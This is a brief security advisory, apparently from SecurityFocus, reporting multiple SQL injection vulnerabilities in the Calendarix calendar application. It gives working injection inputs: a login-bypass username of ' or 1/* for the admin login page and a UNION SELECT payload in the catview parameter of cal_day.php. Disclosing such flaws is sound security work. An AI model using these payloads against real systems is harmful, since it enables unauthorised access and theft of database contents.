Calendarix Multiple SQL Injection Vulnerabilities


An exploit is not required.

Example URI are available:


http://www.example.com/calendarix/admin/cal_login.php
username: ' or 1/*
password: any

http://www.example.com/calendarix/cal_day.php?op=day&date=2006-01-10&catview=99% 20union%20select%2012345


 

Privacy Statement
Copyright 2010, SecurityFocus